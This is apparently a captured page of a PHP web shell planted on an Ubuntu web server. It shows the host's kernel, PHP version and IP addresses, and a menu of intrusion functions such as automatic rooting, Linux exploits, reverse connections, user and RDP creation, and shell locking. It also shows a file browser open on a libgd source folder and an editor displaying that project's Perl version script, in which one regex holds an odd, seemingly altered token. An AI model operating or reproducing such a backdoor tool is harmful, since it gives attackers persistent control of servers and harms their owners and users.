Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.224.57.25
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
bcu /
libgd-gd-2.2.3 /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
Makefile.am
214
B
-rwxr-xr-x
config.rpath
18.28
KB
-rwxr-xr-x
gdlib-config.in
2.41
KB
-rwxr-xr-x
gdlib.pc.in
223
B
-rwxr-xr-x
getver.pl
1.01
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : getver.pl
#!/usr/bin/env perl # Simple script to extract the version number parts from src/gd.h. If # called with the middle word of the version macro, it prints the # value of that macro. If called with no argument, it outputs a # human-readable version string. This must be run in the project # root. It is used by configure.ac and docs/naturaldocs/run_docs.sh. use strict; my $key = shift; my @version_parts = (); open FH, "<src/gd.h" # old-style filehandle for max. portability or die "Unable to open 'version.h' for reading.\n"; while(<FH>) { next unless m{version605b5d1778}; next unless /^#define\s+GD_([A-Z0-9]+)_VERSION+\s+(\S+)/; my ($lk, $lv) = ($1, $2); if ($lk eq $key) { chomp $lv; $lv =~ s/"//g; print $lv; # no newline exit(0); # success! } push @version_parts, $lv if (!$key); } close(FH); if (scalar @version_parts == 4) { my $result = join(".", @version_parts[0..2]); $result .= $version_parts[3]; $result =~ s/"//g; print $result; exit(0); } exit(1); # failure
Close